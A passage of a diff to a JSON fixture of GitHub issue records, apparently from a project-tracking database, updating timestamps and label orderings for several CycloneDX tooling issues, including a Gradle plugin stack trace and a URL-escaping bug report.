}\r\nspring-boot-starter-actuator = { module = \"org.springframework.boot:spring-boot-starter-actuator\" }\r\nspring-boot-starter-oauth2-client = { module = \"org.springframework.boot:spring-boot-starter-oauth2-client\" }\r\nspring-boot-starter-webflux = { module = \"org.springframework.boot:spring-boot-starter-webflux\" }\r\nspring-boot-starter-test = { module = \"org.springframework.boot:spring-boot-starter-test\" }\r\nkotlin-jackson = { module = \"com.fasterxml.jackson.module:jackson-module-kotlin\" }\r\nkotlin-reactor = { module = \"io.projectreactor.kotlin:reactor-kotlin-extensions\" }\r\nkotlin-coroutines-reactor = { module = \"org.jetbrains.kotlinx:kotlinx-coroutines-reactor\" }\r\nreactor-test = { module = \"io.projectreactor:reactor-test\" }\r\nspring-devtools = { module = \"org.springframework.boot:spring-boot-devtools\", version.ref = \"springBoot\" }\r\nspring-annotationProcessor = { module = \"org.springframework.boot:spring-boot-configuration-processor\" }\r\nspring-openapi-common = { module = \"org.springdoc:springdoc-openapi-starter-common\", version.ref = \"springdoc\" }\r\nspring-openapi-ui = { module = \"org.springdoc:springdoc-openapi-starter-webflux-ui\", version.ref = \"springdoc\" }\r\n\r\n[bundles]\r\nkotlin-implementation = [\"kotlin-logging\"]\r\nkotlin-test = [\"kotlin-test\", \"kotlin-junit5\", \"junit\", \"kotlin-test-coroutines\", \"kotlin-test-mockk\"]\r\nspring-basics-implementation = [\"spring-boot-starter-actuator\", \"kotlin-jackson\"]\r\nspring-basics-test = [\"spring-boot-starter-test\"]\r\nspring-web-implementation = [\"spring-boot-starter-webflux\", \"kotlin-reactor\", \"kotlin-coroutines-reactor\", \"spring-openapi-common\", \"spring-openapi-ui\"]\r\nspring-web-test = [\"reactor-test\"]\r\n\r\n[plugins]\r\nkotlin-jvm = { id = \"org.jetbrains.kotlin.jvm\", version.ref = \"kotlin\" }\r\nkotlin-spring = { id = \"org.jetbrains.kotlin.plugin.spring\", version.ref = \"kotlin\" }\r\nspring-boot = { id = \"org.springframework.boot\", version.ref = \"springBoot\" }\r\nspring-sbom = { id = \"org.cyclonedx.bom\", version.ref = \"springSbom\" }\r\nspring-dependencymgmt = { id = \"io.spring.dependency-management\", version.ref = \"springDependencyManagement\" }\r\n\r\n```\r\nand the build.gradle.kts:\r\n```\r\nplugins {\r\n alias(libs.plugins.kotlin.jvm)\r\n alias(libs.plugins.kotlin.spring)\r\n alias(libs.plugins.spring.boot)\r\n alias(libs.plugins.spring.sbom)\r\n alias(libs.plugins.spring.dependencymgmt)\r\n}\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\ngroup = \"org.acme\"\r\nversion = \"0.0.1-SNAPSHOT\"\r\n\r\nconfigurations {\r\n compileOnly {\r\n extendsFrom(configurations.annotationProcessor.get())\r\n }\r\n}\r\n\r\ndependencies {\r\n implementation(libs.payfree.common.kotlin)\r\n\r\n implementation(platform(libs.kotlin.bom))\r\n implementation(libs.bundles.kotlin.implementation)\r\n testImplementation(libs.bundles.kotlin.test)\r\n\r\n compileOnly(libs.spring.devtools)\r\n annotationProcessor(libs.spring.annotationProcessor)\r\n implementation(libs.bundles.spring.basics.implementation)\r\n testImplementation(libs.bundles.spring.basics.test)\r\n implementation(libs.bundles.spring.web.implementation)\r\n testImplementation(libs.bundles.spring.web.test)\r\n\r\n implementation(libs.spring.boot.starter.oauth2.client)\r\n}\r\n\r\nkotlin {\r\n jvmToolchain(21)\r\n compilerOptions {\r\n freeCompilerArgs.add(\"-Xjsr305=strict\")\r\n }\r\n}\r\n\r\ntasks.withType {\r\n useJUnitPlatform()\r\n}\r\n\r\nspringBoot {\r\n buildInfo()\r\n}\r\n```\r\ncommand: `./gradlew cyclonedxBom --stacktrace`\r\n\r\n\r\n**Expected behavior**\r\nNo warning and no failing build... I guess\r\n\r\n**Environment (please complete the following information):**\r\n./gradlew --version:\r\n```\r\n------------------------------------------------------------\r\nGradle 8.10\r\n------------------------------------------------------------\r\n\r\nBuild time: 2024-08-14 11:07:45 UTC\r\nRevision: fef2edbed8af1022cefaf44d4c0514c5f89d7b78\r\n\r\nKotlin: 1.9.24\r\nGroovy: 3.0.22\r\nAnt: Apache Ant(TM) version 1.10.14 compiled on August 16 2023\r\nLauncher JVM: 22.0.1 (Eclipse Adoptium 22.0.1+8)\r\nDaemon JVM: /nix/store/nalsxmrygjrx99cq1q6hmw7k9vp3x44n-temurin-bin-22.0.1 (no JDK specified, using current Java home)\r\nOS: Linux 6.6.45 amd64\r\n```\r\n - CycloneDX Plugin version: 1.10.0\r\n\r\n**Additional context**\r\nthe stacktrace:\r\n```\r\n╰─ ./gradlew cyclonedxBom --stacktrace\r\n\r\n\r\n> Task :cyclonedxBom FAILED\r\nAn unexpected issue occurred attempting to create a PackageURL for org.jetbrains.kotlin:kotlin-native-prebuilt:2.0.10\r\n\r\nFAILURE: Build failed with an exception.\r\n\r\n* What went wrong:\r\nExecution failed for task ':cyclonedxBom'.\r\n> java.lang.NullPointerException (no error message)\r\n\r\n* Try:\r\n> Run with --info or --debug option to get more log output.\r\n> Run with --scan to get full insights.\r\n> Get more help at https://help.gradle.org.\r\n\r\n* Exception is:\r\norg.gradle.api.tasks.TaskExecutionException: Execution failed for task ':cyclonedxBom'.\r\n\tat org.gradle.api.internal.tasks.execution.ExecuteActionsTaskExecuter.lambda$executeIfValid$1(ExecuteActionsTaskExecuter.java:130)\r\n\tat org.gradle.internal.Try$Failure.ifSuccessfulOrElse(Try.java:293)\r\n\tat org.gradle.api.internal.tasks.execution.ExecuteActionsTaskExecuter.executeIfValid(ExecuteActionsTaskExecuter.java:128)\r\n\tat org.gradle.api.internal.tasks.execution.ExecuteActionsTaskExecuter.execute(ExecuteActionsTaskExecuter.java:116)\r\n\tat org.gradle.api.internal.tasks.execution.FinalizePropertiesTaskExecuter.execute(FinalizePropertiesTaskExecuter.java:46)\r\n\tat org.gradle.api.internal.tasks.execution.ResolveTaskExecutionModeExecuter.execute(ResolveTaskExecutionModeExecuter.java:51)\r\n\tat org.gradle.api.internal.tasks.execution.SkipTaskWithNoActionsExecuter.execute(SkipTaskWithNoActionsExecuter.java:57)\r\n\tat org.gradle.api.internal.tasks.execution.SkipOnlyIfTaskExecuter.execute(SkipOnlyIfTaskExecuter.java:74)\r\n\tat org.gradle.api.internal.tasks.execution.CatchExceptionTaskExecuter.execute(CatchExceptionTaskExecuter.java:36)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter$1.executeTask(EventFiringTaskExecuter.java:77)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter$1.call(EventFiringTaskExecuter.java:55)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter$1.call(EventFiringTaskExecuter.java:52)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:209)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:204)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:66)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:166)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.call(DefaultBuildOperationRunner.java:53)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter.execute(EventFiringTaskExecuter.java:52)\r\n\tat org.gradle.execution.plan.LocalTaskNodeExecutor.execute(LocalTaskNodeExecutor.java:42)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$InvokeNodeExecutorsAction.execute(DefaultTaskExecutionGraph.java:331)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$InvokeNodeExecutorsAction.execute(DefaultTaskExecutionGraph.java:318)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$BuildOperationAwareExecutionAction.lambda$execute$0(DefaultTaskExecutionGraph.java:314)\r\n\tat org.gradle.internal.operations.CurrentBuildOperationRef.with(CurrentBuildOperationRef.java:85)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$BuildOperationAwareExecutionAction.execute(DefaultTaskExecutionGraph.java:314)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$BuildOperationAwareExecutionAction.execute(DefaultTaskExecutionGraph.java:303)\r\n\tat org.gradle.execution.plan.DefaultPlanExecutor$ExecutorWorker.execute(DefaultPlanExecutor.java:459)\r\n\tat org.gradle.execution.plan.DefaultPlanExecutor$ExecutorWorker.run(DefaultPlanExecutor.java:376)\r\n\tat org.gradle.internal.concurrent.ExecutorPolicy$CatchAndRecordFailures.onExecute(ExecutorPolicy.java:64)\r\n\tat org.gradle.internal.concurrent.AbstractManagedExecutor$1.run(AbstractManagedExecutor.java:48)\r\nCaused by: java.lang.NullPointerException\r\n\tat org.cyclonedx.gradle.CycloneDxTask.lambda$null$4(CycloneDxTask.java:402)\r\n\tat org.cyclonedx.gradle.CycloneDxTask.lambda$createBom$5(CycloneDxTask.java:391)\r\n\tat org.cyclonedx.gradle.CycloneDxTask.createBom(CycloneDxTask.java:355)\r\n\tat java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)\r\n\tat org.gradle.internal.reflect.JavaMethod.invoke(JavaMethod.java:125)\r\n\tat org.gradle.api.internal.project.taskfactory.StandardTaskAction.doExecute(StandardTaskAction.java:58)\r\n\tat org.gradle.api.internal.project.taskfactory.StandardTaskAction.execute(StandardTaskAction.java:51)\r\n\tat org.gradle.api.internal.project.taskfactory.StandardTaskAction.execute(StandardTaskAction.java:29)\r\n\tat org.gradle.api.internal.tasks.execution.TaskExecution$3.run(TaskExecution.java:244)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:29)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:26)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:66)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:166)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.run(DefaultBuildOperationRunner.java:47)\r\n\tat org.gradle.api.internal.tasks.execution.TaskExecution.executeAction(TaskExecution.java:229)\r\n\tat org.gradle.api.internal.tasks.execution.TaskExecution.executeActions(TaskExecution.java:212)\r\n\tat org.gradle.api.internal.tasks.execution.TaskExecution.executeWithPreviousOutputFiles(TaskExecution.java:195)\r\n\tat org.gradle.api.internal.tasks.execution.TaskExecution.execute(TaskExecution.java:162)\r\n\tat org.gradle.internal.execution.steps.ExecuteStep.executeInternal(ExecuteStep.java:105)\r\n\tat org.gradle.internal.execution.steps.ExecuteStep.access$000(ExecuteStep.java:44)\r\n\tat org.gradle.internal.execution.steps.ExecuteStep$1.call(ExecuteStep.java:59)\r\n\tat org.gradle.internal.execution.steps.ExecuteStep$1.call(ExecuteStep.java:56)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:209)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:204)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:66)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:166)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.call(DefaultBuildOperationRunner.java:53)\r\n\tat org.gradle.internal.execution.steps.ExecuteStep.execute(ExecuteStep.java:56)\r\n\tat org.gradle.internal.execution.steps.ExecuteStep.execute(ExecuteStep.java:44)\r\n\tat org.gradle.internal.execution.steps.CancelExecutionStep.execute(CancelExecutionStep.java:42)\r\n\tat org.gradle.internal.execution.steps.TimeoutStep.executeWithoutTimeout(TimeoutStep.java:75)\r\n\tat org.gradle.internal.execution.steps.TimeoutStep.execute(TimeoutStep.java:55)\r\n\tat org.gradle.internal.execution.steps.PreCreateOutputParentsStep.execute(PreCreateOutputParentsStep.java:50)\r\n\tat org.gradle.internal.execution.steps.PreCreateOutputParentsStep.execute(PreCreateOutputParentsStep.java:28)\r\n\tat org.gradle.internal.execution.steps.RemovePreviousOutputsStep.execute(RemovePreviousOutputsStep.java:67)\r\n\tat org.gradle.internal.execution.steps.RemovePreviousOutputsStep.execute(RemovePreviousOutputsStep.java:37)\r\n\tat org.gradle.internal.execution.steps.BroadcastChangingOutputsStep.execute(BroadcastChangingOutputsStep.java:61)\r\n\tat org.gradle.internal.execution.steps.BroadcastChangingOutputsStep.execute(BroadcastChangingOutputsStep.java:26)\r\n\tat org.gradle.internal.execution.steps.CaptureOutputsAfterExecutionStep.execute(CaptureOutputsAfterExecutionStep.java:69)\r\n\tat org.gradle.internal.execution.steps.CaptureOutputsAfterExecutionStep.execute(CaptureOutputsAfterExecutionStep.java:46)\r\n\tat org.gradle.internal.execution.steps.ResolveInputChangesStep.execute(ResolveInputChangesStep.java:40)\r\n\tat org.gradle.internal.execution.steps.ResolveInputChangesStep.execute(ResolveInputChangesStep.java:29)\r\n\tat org.gradle.internal.execution.steps.BuildCacheStep.executeWithoutCache(BuildCacheStep.java:189)\r\n\tat org.gradle.internal.execution.steps.BuildCacheStep.lambda$execute$1(BuildCacheStep.java:75)\r\n\tat org.gradle.internal.Either$Right.fold(Either.java:175)\r\n\tat org.gradle.internal.execution.caching.CachingState.fold(CachingState.java:62)\r\n\tat org.gradle.internal.execution.steps.BuildCacheStep.execute(BuildCacheStep.java:73)\r\n\tat org.gradle.internal.execution.steps.BuildCacheStep.execute(BuildCacheStep.java:48)\r\n\tat org.gradle.internal.execution.steps.StoreExecutionStateStep.execute(StoreExecutionStateStep.java:46)\r\n\tat org.gradle.internal.execution.steps.StoreExecutionStateStep.execute(StoreExecutionStateStep.java:35)\r\n\tat org.gradle.internal.execution.steps.SkipUpToDateStep.executeBecause(SkipUpToDateStep.java:75)\r\n\tat org.gradle.internal.execution.steps.SkipUpToDateStep.lambda$execute$2(SkipUpToDateStep.java:53)\r\n\tat org.gradle.internal.execution.steps.SkipUpToDateStep.execute(SkipUpToDateStep.java:53)\r\n\tat org.gradle.internal.execution.steps.SkipUpToDateStep.execute(SkipUpToDateStep.java:35)\r\n\tat org.gradle.internal.execution.steps.legacy.MarkSnapshottingInputsFinishedStep.execute(MarkSnapshottingInputsFinishedStep.java:37)\r\n\tat org.gradle.internal.execution.steps.legacy.MarkSnapshottingInputsFinishedStep.execute(MarkSnapshottingInputsFinishedStep.java:27)\r\n\tat org.gradle.internal.execution.steps.ResolveIncrementalCachingStateStep.executeDelegate(ResolveIncrementalCachingStateStep.java:49)\r\n\tat org.gradle.internal.execution.steps.ResolveIncrementalCachingStateStep.executeDelegate(ResolveIncrementalCachingStateStep.java:27)\r\n\tat org.gradle.internal.execution.steps.AbstractResolveCachingStateStep.execute(AbstractResolveCachingStateStep.java:71)\r\n\tat org.gradle.internal.execution.steps.AbstractResolveCachingStateStep.execute(AbstractResolveCachingStateStep.java:39)\r\n\tat org.gradle.internal.execution.steps.ResolveChangesStep.execute(ResolveChangesStep.java:65)\r\n\tat org.gradle.internal.execution.steps.ResolveChangesStep.execute(ResolveChangesStep.java:36)\r\n\tat org.gradle.internal.execution.steps.ValidateStep.execute(ValidateStep.java:107)\r\n\tat org.gradle.internal.execution.steps.ValidateStep.execute(ValidateStep.java:56)\r\n\tat org.gradle.internal.execution.steps.AbstractCaptureStateBeforeExecutionStep.execute(AbstractCaptureStateBeforeExecutionStep.java:64)\r\n\tat org.gradle.internal.execution.steps.AbstractCaptureStateBeforeExecutionStep.execute(AbstractCaptureStateBeforeExecutionStep.java:43)\r\n\tat org.gradle.internal.execution.steps.AbstractSkipEmptyWorkStep.executeWithNonEmptySources(AbstractSkipEmptyWorkStep.java:125)\r\n\tat org.gradle.internal.execution.steps.AbstractSkipEmptyWorkStep.execute(AbstractSkipEmptyWorkStep.java:56)\r\n\tat org.gradle.internal.execution.steps.AbstractSkipEmptyWorkStep.execute(AbstractSkipEmptyWorkStep.java:36)\r\n\tat org.gradle.internal.execution.steps.legacy.MarkSnapshottingInputsStartedStep.execute(MarkSnapshottingInputsStartedStep.java:38)\r\n\tat org.gradle.internal.execution.steps.LoadPreviousExecutionStateStep.execute(LoadPreviousExecutionStateStep.java:36)\r\n\tat org.gradle.internal.execution.steps.LoadPreviousExecutionStateStep.execute(LoadPreviousExecutionStateStep.java:23)\r\n\tat org.gradle.internal.execution.steps.HandleStaleOutputsStep.execute(HandleStaleOutputsStep.java:75)\r\n\tat org.gradle.internal.execution.steps.HandleStaleOutputsStep.execute(HandleStaleOutputsStep.java:41)\r\n\tat org.gradle.internal.execution.steps.AssignMutableWorkspaceStep.lambda$execute$0(AssignMutableWorkspaceStep.java:35)\r\n\tat org.gradle.api.internal.tasks.execution.TaskExecution$4.withWorkspace(TaskExecution.java:289)\r\n\tat org.gradle.internal.execution.steps.AssignMutableWorkspaceStep.execute(AssignMutableWorkspaceStep.java:31)\r\n\tat org.gradle.internal.execution.steps.AssignMutableWorkspaceStep.execute(AssignMutableWorkspaceStep.java:22)\r\n\tat org.gradle.internal.execution.steps.ChoosePipelineStep.execute(ChoosePipelineStep.java:40)\r\n\tat org.gradle.internal.execution.steps.ChoosePipelineStep.execute(ChoosePipelineStep.java:23)\r\n\tat org.gradle.internal.execution.steps.ExecuteWorkBuildOperationFiringStep.lambda$execute$2(ExecuteWorkBuildOperationFiringStep.java:67)\r\n\tat org.gradle.internal.execution.steps.ExecuteWorkBuildOperationFiringStep.execute(ExecuteWorkBuildOperationFiringStep.java:67)\r\n\tat org.gradle.internal.execution.steps.ExecuteWorkBuildOperationFiringStep.execute(ExecuteWorkBuildOperationFiringStep.java:39)\r\n\tat org.gradle.internal.execution.steps.IdentityCacheStep.execute(IdentityCacheStep.java:46)\r\n\tat org.gradle.internal.execution.steps.IdentityCacheStep.execute(IdentityCacheStep.java:34)\r\n\tat org.gradle.internal.execution.steps.IdentifyStep.execute(IdentifyStep.java:48)\r\n\tat org.gradle.internal.execution.steps.IdentifyStep.execute(IdentifyStep.java:35)\r\n\tat org.gradle.internal.execution.impl.DefaultExecutionEngine$1.execute(DefaultExecutionEngine.java:61)\r\n\tat org.gradle.api.internal.tasks.execution.ExecuteActionsTaskExecuter.executeIfValid(ExecuteActionsTaskExecuter.java:127)\r\n\tat org.gradle.api.internal.tasks.execution.ExecuteActionsTaskExecuter.execute(ExecuteActionsTaskExecuter.java:116)\r\n\tat org.gradle.api.internal.tasks.execution.FinalizePropertiesTaskExecuter.execute(FinalizePropertiesTaskExecuter.java:46)\r\n\tat org.gradle.api.internal.tasks.execution.ResolveTaskExecutionModeExecuter.execute(ResolveTaskExecutionModeExecuter.java:51)\r\n\tat org.gradle.api.internal.tasks.execution.SkipTaskWithNoActionsExecuter.execute(SkipTaskWithNoActionsExecuter.java:57)\r\n\tat org.gradle.api.internal.tasks.execution.SkipOnlyIfTaskExecuter.execute(SkipOnlyIfTaskExecuter.java:74)\r\n\tat org.gradle.api.internal.tasks.execution.CatchExceptionTaskExecuter.execute(CatchExceptionTaskExecuter.java:36)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter$1.executeTask(EventFiringTaskExecuter.java:77)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter$1.call(EventFiringTaskExecuter.java:55)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter$1.call(EventFiringTaskExecuter.java:52)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:209)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:204)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:66)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner$2.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:166)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:59)\r\n\tat org.gradle.internal.operations.DefaultBuildOperationRunner.call(DefaultBuildOperationRunner.java:53)\r\n\tat org.gradle.api.internal.tasks.execution.EventFiringTaskExecuter.execute(EventFiringTaskExecuter.java:52)\r\n\tat org.gradle.execution.plan.LocalTaskNodeExecutor.execute(LocalTaskNodeExecutor.java:42)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$InvokeNodeExecutorsAction.execute(DefaultTaskExecutionGraph.java:331)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$InvokeNodeExecutorsAction.execute(DefaultTaskExecutionGraph.java:318)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$BuildOperationAwareExecutionAction.lambda$execute$0(DefaultTaskExecutionGraph.java:314)\r\n\tat org.gradle.internal.operations.CurrentBuildOperationRef.with(CurrentBuildOperationRef.java:85)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$BuildOperationAwareExecutionAction.execute(DefaultTaskExecutionGraph.java:314)\r\n\tat org.gradle.execution.taskgraph.DefaultTaskExecutionGraph$BuildOperationAwareExecutionAction.execute(DefaultTaskExecutionGraph.java:303)\r\n\tat org.gradle.execution.plan.DefaultPlanExecutor$ExecutorWorker.execute(DefaultPlanExecutor.java:459)\r\n\tat org.gradle.execution.plan.DefaultPlanExecutor$ExecutorWorker.run(DefaultPlanExecutor.java:376)\r\n\tat org.gradle.internal.concurrent.ExecutorPolicy$CatchAndRecordFailures.onExecute(ExecutorPolicy.java:64)\r\n\tat org.gradle.internal.concurrent.AbstractManagedExecutor$1.run(AbstractManagedExecutor.java:48)\r\n\r\n\r\nBUILD FAILED in 21s\r\n1 actionable task: 1 executed\r\n```", @@ -94378,10 +94384,10 @@ "sequence_id": 2479963734, "is_locked": false, "lock_reason": "", - "comments_count": 2, + "comments_count": 3, "closed_at": null, "created_at": "2024-08-22T06:39:56Z", - "updated_at": "2024-09-18T13:43:01Z", + "updated_at": "2024-09-21T18:34:12Z", "author": 1414, "repository": 1262, "assignees": [], @@ -94446,10 +94452,10 @@ "repository": 1263, "assignees": [], "labels": [ - 559, 560, 561, - 562 + 562, + 559 ] } }, @@ -94510,9 +94516,9 @@ "repository": 1263, "assignees": [], "labels": [ - 559, 560, - 564 + 564, + 559 ] } }, @@ -94542,8 +94548,8 @@ "repository": 1263, "assignees": [], "labels": [ - 559, - 560 + 560, + 559 ] } }, @@ -94573,9 +94579,9 @@ "repository": 1263, "assignees": [], "labels": [ - 559, 560, - 565 + 565, + 559 ] } }, @@ -94605,9 +94611,9 @@ "repository": 1263, "assignees": [], "labels": [ - 559, 560, - 566 + 566, + 559 ] } }, @@ -94637,9 +94643,9 @@ "repository": 1263, "assignees": [], "labels": [ - 559, 560, - 567 + 567, + 559 ] } }, @@ -94669,8 +94675,8 @@ "repository": 1263, "assignees": [], "labels": [ - 564, - 568 + 568, + 564 ] } }, @@ -94700,10 +94706,10 @@ "repository": 1263, "assignees": [], "labels": [ - 559, 560, + 569, 565, - 569 + 559 ] } }, @@ -94776,7 +94782,7 @@ "pk": 3132, "fields": { "nest_created_at": "2024-09-11T23:25:45.376Z", - "nest_updated_at": "2024-09-18T18:57:09.196Z", + "nest_updated_at": "2024-09-22T18:46:43.129Z", "node_id": "I_kwDOGyi1Bc6VG-BM", "title": "support `packageurl-js` >= 2.0.0", "body": "currently supporting `packageurl-js >=0.0.6 <0.0.8 || ^1`\r\n\r\ngoal: have support for `^2` added, while still maintaining support for the other versions that were supported already.\r\n\r\n---\r\n\r\nsee release notes: \r\nsee changes: ", @@ -96757,7 +96763,7 @@ "pk": 3201, "fields": { "nest_created_at": "2024-09-11T23:28:09.598Z", - "nest_updated_at": "2024-09-18T18:57:18.739Z", + "nest_updated_at": "2024-09-22T18:46:55.626Z", "node_id": "I_kwDOBY9_NM6Vnr6G", "title": "Wrong log-message while attaching bom with classifier", "body": "There is a wrong log-message while attaching bom with a classifier (the classifier is not taken into account) in version 2.8.1. The functionality itself works as expected.\r\n\r\nE.g.\r\n```\r\n...\r\nxyz\r\n```\r\n\r\nLog-Message (wrong):\r\n```\r\n[INFO] CycloneDX: Writing and validating BOM (JSON): /foo/myproject/target/bom.json\r\n[INFO] attaching as myproject-2024.2.0-SNAPSHOT-cyclonedx.json\r\n```\r\n\r\nLog-Message (expected):\r\n```\r\n[INFO] CycloneDX: Writing and validating BOM (JSON): /foo/myproject/target/bom.json\r\n[INFO] attaching as myproject-2024.2.0-SNAPSHOT-xyz.json\r\n```\r\n", @@ -97254,7 +97260,7 @@ "pk": 3217, "fields": { "nest_created_at": "2024-09-11T23:29:55.248Z", - "nest_updated_at": "2024-09-18T18:57:27.177Z", + "nest_updated_at": "2024-09-22T18:47:18.475Z", "node_id": "I_kwDOHtDk2s6U1ODY", "title": "[BUG] URL with quotation marks violates XML schema", "body": "## Describe the bug\r\n\r\nI'm using version 1.19.3 to generate an SBOM. One of the transitive dependencies of the project is polyfills shadycss. They list their bugs.url as \"https://github.com/webcomponents/polyfills/issues?q=is%3Aissue+is%3Aopen+label%3A\\\"Package%3A+shadycss\\\"\". This gets converted to \"https://github.com/webcomponents/polyfills/issues?q=is%3Aissue\\u002Bis%3Aopen\\u002Blabel%3A\\u0022Package%3A\\u002Bshadycss\\u0022\".\r\nWhen sending this URL as part of the SBOM uploaded to Dependecytrack, the schema validation fails with the following error:\r\n```\r\n{\"status\":400,\"title\":\"The uploaded BOM is invalid\",\"detail\":\"Schema validation failed\",\"errors\":[\"$.components[88].externalReferences[2].url: does not match the iri-reference pattern must be a valid RFC 3987 IRI-reference\",\"$.components[88].externalReferences[2].url: does not match the iri-reference pattern must be a valid RFC 3987 IRI-reference\",\"$.components[88].externalReferences[2].url: does not match the regex pattern ^urn:cdx:[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/[1-9][0-9]*$\",\"$.components[88].externalReferences[2].url: does not match the iri-reference pattern must be a valid RFC 3987 IRI-reference\",\"$.components[88].externalReferences[2].url: does not match the regex pattern ^urn:cdx:[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/[1-9][0-9]*#.+$\"]}\r\n```\r\nThis seems similar to the problem in https://github.com/CycloneDX/cyclonedx-node-npm/issues/1198\r\n\r\n## To Reproduce\r\n\r\nAdd a bugs entry to the package.json similar to the one in shadycss:\r\n```\r\n\"bugs\": \"https://github.com/webcomponents/polyfills/issues?q=is%3Aissue+is%3Aopen+label%3A\\\"Package%3A+shadycss\\\"\"\r\n```\r\nhttps://github.com/webcomponents/polyfills/blob/794d56d6276258f39f09108c5f2c9451609e0b94/packages/shadycss/package.json#L16C3-L16C117\r\n\r\n## Expected behavior\r\n\r\nThe URL needs to be sanitized and accepted by Dependencytrack for further processing.\r\n\r\n## Screenshots or output-paste\r\n\r\nThe externalReference in the generated SBOM looks like this:\r\n```\r\n{\r\n \"url\": \"https://github.com/webcomponents/polyfills/issues?q=is%3Aissue\\u002Bis%3Aopen\\u002Blabel%3A\\u0022Package%3A\\u002Bshadycss\\u0022\",\r\n \"type\": \"issue-tracker\",\r\n \"comment\": \"as detected from PackageJson property \\u0022bugs.url\\u0022\"\r\n}\r\n```\r\n\r\n## Environment\r\n\r\n- _@cyclonedx/cyclonedx-npm_ version: 1.19.3\r\n- NPM version: 10.7.0\r\n- Node version: 20.14.0\r\n- OS: Linux\r\n\r\n## Additional context\r\n\r\nI develop in Java and this is a problem \"caused\" by our webframework using Node behind the scenes. As such, I won't be able to help much.\r\n", @@ -97284,7 +97290,7 @@ "pk": 3218, "fields": { "nest_created_at": "2024-09-11T23:30:42.160Z", - "nest_updated_at": "2024-09-18T18:57:32.172Z", + "nest_updated_at": "2024-09-22T18:47:25.629Z", "node_id": "I_kwDOIGxP9c5519jS", "title": ":mega: looking for contributors", "body": "This project is currently looking for contributors.\r\n\r\nDrop a note, or ping, if you are interested.", @@ -97739,8 +97745,8 @@ "assignees": [], "labels": [ 592, - 599, - 600 + 600, + 599 ] } }, @@ -97925,8 +97931,8 @@ "labels": [ 592, 593, - 601, - 602 + 602, + 601 ] } }, @@ -97935,7 +97941,7 @@ "pk": 3239, "fields": { "nest_created_at": "2024-09-11T23:31:45.408Z", - "nest_updated_at": "2024-09-18T18:57:48.675Z", + "nest_updated_at": "2024-09-22T18:47:44.863Z", "node_id": "I_kwDODABx0c6T3-9g", "title": "Official support for php8.4", "body": "## Is your feature request related to a problem? Please describe.\r\n\r\nAdd official support for PHP8.4\r\n\r\n## Describe the solution you'd like\r\n\r\nassert PHP 8.4 support in 